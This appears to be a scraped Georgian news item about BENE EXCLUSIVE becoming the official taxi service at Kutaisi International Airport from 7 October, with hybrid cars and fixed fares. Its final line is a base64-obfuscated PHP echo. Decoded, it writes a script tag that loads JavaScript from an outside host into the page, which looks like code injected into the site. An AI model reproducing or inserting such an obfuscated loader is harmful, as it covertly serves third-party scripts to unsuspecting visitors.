celsiusi
ავერსი საქკაბელი

7 ოქტომბრიდან,  ქუთაისის საერთაშორისო აეროპორტში მგზავრებს ახალი სერვისი დახვდებათ.  საქართველოს აეროპორტების გაერთიანებამ ელექტრონულ აუქციონში გამარჯვებულ კომპანია BENE EXCLUSIVE-თან აეროპორტის ოფიციალური ტაქსის მომსახურებასთან დაკავშირებით ხელშეკრულება გააფორმა. კომპანია აეროპორტის მგზავრებს Kia-ს და Toyota-ს ფირმის ეკოლოგიურად სუფთა, უახლეს ჰიბრიდულ ავტომობილებს, დაზღვეულ მგზავრობასა და ფიქსირებულ ტარიფებს სთავაზობს.

ავტობუსების შემდეგ, აეროპორტი თავის მგზავრებს ტაქსის ოფიციალურ სერვისს სთავაზობს, რომელიც მთლიანად  მგზავრის კომფორტზე უსაფრთხოებასა და საჭიროებებზე იქნება ორიენტირებული.

ქართული კომპანია BENE EXCLUSIVE მომსახურებას ქუთაისის აეროპორტის მგზავრებს ონლაინ ჯავშნების სახით და ადგილზე, აეროპორტის ჩამოფრენის დარბაზში შესთავაზებს. ოფიციალური ტაქსით გადაადგილება მგზავრებს აეროპორტიდან თბილისში, ქუთაისსა და ბათუმში ფიქსირებულ ფასში (ზედა ზღვრის გათვალისწინებით) შეეძლებათ. ხოლო საქართველოს სხვა მიმართულებით კილომეტრაჟის მიხედვით. რაც ქუთაისის აეროპორტს მგზავრებისთვის კიდევ უფრო ხელმისაწვდომს გახდის.  

დაინტერესებული პირები დამატებითი ინფორმაციისთვის დაუკავშირდით კომპანიას ტელეფონის ნომერზე: 032 052 100 ან ვებგვერდზე www.flytaxi.com

BENE EXCLUSIVE საქართველოს ბაზარზე 2017 წლიდან ოპერირებს და მის ავტოპარკში 150 ზე მეტი სხვადასხვა კატეგორიის ავტომობილია წარმოდგენილი.

238
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");